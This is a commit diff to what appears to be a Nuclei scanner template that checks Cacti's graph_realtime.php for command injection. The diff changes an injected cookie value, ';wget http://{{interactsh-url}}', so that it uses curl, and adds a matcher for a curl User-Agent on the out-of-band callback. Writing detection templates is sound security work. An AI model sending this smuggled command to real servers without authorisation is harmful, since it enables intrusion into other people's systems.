commit
dd821571bc
|
@ -23,7 +23,7 @@ requests:
|
|||
- |
|
||||
GET /graph_realtime.php?action=init HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
|
||||
Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
@ -31,4 +31,9 @@ requests:
|
|||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: curl"
|
||||
|
||||
# Enhanced by mp on 2022/06/27
|
||||
|
|
Loading…
Reference in New Issue